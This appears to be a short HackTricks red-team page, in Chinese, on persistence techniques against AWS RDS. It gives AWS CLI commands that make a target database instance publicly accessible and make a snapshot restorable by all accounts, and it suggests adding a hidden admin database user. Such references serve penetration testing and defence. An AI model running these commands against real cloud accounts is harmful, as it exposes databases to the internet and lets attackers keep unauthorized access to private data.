AWS - RDS 持久性

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

RDS

欲了解更多信息,请查看:

AWS - Relational Database (RDS) Enum

将实例设为公开可访问: rds:ModifyDBInstance

拥有该权限的攻击者可以修改现有的 RDS 实例以启用公共访问

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

在 DB 内创建一个管理员用户

攻击者可以简单地在 DB 中创建一个用户,这样即使 master 用户的密码被修改,他也不会失去对数据库的访问

使快照公开

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks